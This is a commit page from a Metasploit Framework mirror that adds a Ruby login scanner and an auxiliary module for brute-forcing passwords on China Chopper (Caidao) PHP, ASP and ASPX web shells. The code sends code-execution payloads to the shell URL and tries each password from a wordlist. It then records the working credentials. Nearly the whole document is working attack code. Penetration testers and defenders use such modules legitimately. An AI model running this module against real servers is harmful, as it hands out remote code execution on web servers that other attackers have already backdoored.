infosecn1nja
/
metasploit-framework
mirror of https://github.com/infosecn1nja/metasploit-framework.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

chinese caidao asp/aspx/php backdoor bruteforce

bug/bundler_fix
nixawk 2015-12-31 15:17:01 +08:00
parent d1ceda39e9
commit 370351ca88
2 changed files with 166 additions and 0 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

84
lib/metasploit/framework/login_scanner/caidao.rb Normal file
View File

@ -0,0 +1,84 @@
require 'metasploit/framework/login_scanner/http'
module Metasploit
module Framework
module LoginScanner
# Chinese Caidao login scanner
class Caidao < HTTP
# Inherit LIKELY_PORTS, LIKELY_SERVICE_NAMES, and REALM_KEY from HTTP
DEFAULT_PORT = 80
PRIVATE_TYPES = [ :password ]
def set_sane_defaults
self.method = "POST" if self.method.nil?
end
def attempt_login(credential)
result_opts = {
credential: credential,
host: host,
port: port,
protocol: 'tcp'
}
if ssl
result_opts[:service_name] = 'https'
else
result_opts[:service_name] = 'http'
end
begin
status = try_login(credential)
result_opts.merge!(status)
rescue ::EOFError, Errno::ETIMEDOUT, Errno::ECONNRESET, Rex::ConnectionError, OpenSSL::SSL::SSLError, ::Timeout::Error => e
result_opts.merge!(status: Metasploit::Model::Login::Status::UNABLE_TO_CONNECT, proof: e)
end
Result.new(result_opts)
end
def try_login(credential)
cli = Rex::Proto::Http::Client.new(host, port, { 'Msf' => framework, 'MsfExploit' => framework_module }, ssl, ssl_version, proxies)
configure_http_client(cli)
cli.connect
flag = Rex::Text.rand_text_alphanumeric(4)
lmark = Rex::Text.rand_text_alphanumeric(4)
rmark = Rex::Text.rand_text_alphanumeric(4)
case self.uri
when /php$/mi
payload = "$_=\"#{flag}\";echo \"#{lmark}\".$_.\"#{rmark}\";"
when /asp$/mi
payload = 'execute("response.write(""'
payload << "#{lmark}"
payload << '""):response.write(""'
payload << "#{flag}"
payload << '""):response.write(""'
payload << "#{rmark}"
payload << '""):response.end")'
when /aspx$/mi
payload = "Response.Write(\"#{lmark}\");"
payload << "Response.Write(\"#{flag}\");"
payload << "Response.Write(\"#{rmark}\")"
else
print_error("Backdoor type is not support")
return
end
req = cli.request_cgi({
'method' => method,
'uri' => uri,
'data' => "#{credential.private}=#{payload}"
})
res = cli.send_recv(req)
if res && res.code == 200 && res.body.to_s.include?("#{lmark}#{flag}#{rmark}")
return { :status => Metasploit::Model::Login::Status::SUCCESSFUL, :proof => res.body }
end
{ :status => Metasploit::Model::Login::Status::INCORRECT, :proof => res.body }
end
end
end
end
end

82
modules/auxiliary/scanner/http/caidao_bruteforce_login.rb Normal file
View File

@ -0,0 +1,82 @@
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
require 'metasploit/framework/credential_collection'
require 'metasploit/framework/login_scanner/caidao'
class Metasploit4 < Msf::Auxiliary
include Msf::Exploit::Remote::HttpClient
include Msf::Auxiliary::Scanner
include Msf::Auxiliary::Report
include Msf::Auxiliary::AuthBrute
def initialize(info = {})
super(update_info(info,
'Name' => 'Chinese Caidao Backdoor Bruteorce',
'Description' => 'This module attempts to brute chinese caidao asp/php/aspx backdoor.',
'Author' => [ 'Nixawk' ],
'References' => [
['URL', 'https://www.fireeye.com/blog/threat-research/2013/08/breaking-down-the-china-chopper-web-shell-part-i.html'],
['URL', 'https://www.fireeye.com/blog/threat-research/2013/08/breaking-down-the-china-chopper-web-shell-part-ii.html'],
['URL', 'https://www.exploit-db.com/docs/27654.pdf'],
['URL', 'https://www.us-cert.gov/ncas/alerts/TA15-313A'],
['URL', 'http://blog.csdn.net/nixawk/article/details/40430329']
],
'License' => MSF_LICENSE
))
register_options(
[
OptString.new('LOGIN_URL', [true, 'The URL that handles the login process', '/caidao.php']),
OptPath.new('PASS_FILE', [
false,
'The file that contains a list of of probable passwords.',
File.join(Msf::Config.install_root, 'data', 'wordlists', 'unix_passwords.txt')
])
], self.class)
end
def run_host(ip)
cred_collection = Metasploit::Framework::CredentialCollection.new(
blank_passwords: datastore['BLANK_PASSWORDS'],
pass_file: datastore['PASS_FILE'],
password: datastore['PASSWORD'],
user_file: datastore['USER_FILE'],
userpass_file: datastore['USERPASS_FILE'],
username: datastore['USERNAME'],
user_as_pass: datastore['USER_AS_PASS']
)
scanner = Metasploit::Framework::LoginScanner::Caidao.new(
configure_http_login_scanner(
uri: datastore['LOGIN_URL'],
method: datastore['HTTP_METHOD'],
cred_details: cred_collection,
stop_on_success: datastore['STOP_ON_SUCCESS'],
bruteforce_speed: datastore['BRUTEFORCE_SPEED'],
connection_timeout: 10
)
)
scanner.scan! do |result|
credential_data = result.to_h
credential_data.merge!(
module_fullname: fullname,
workspace_id: myworkspace_id
)
if result.success?
credential_core = create_credential(credential_data)
credential_data[:core] = credential_core
create_credential_login(credential_data)
print_good "#{ip}:#{rport} - LOGIN SUCCESSFUL: #{result.credential}"
else
invalidate_login(credential_data)
vprint_error "#{ip}:#{rport} - LOGIN FAILED: #{result.credential} (#{result.status})"
end
end
end
end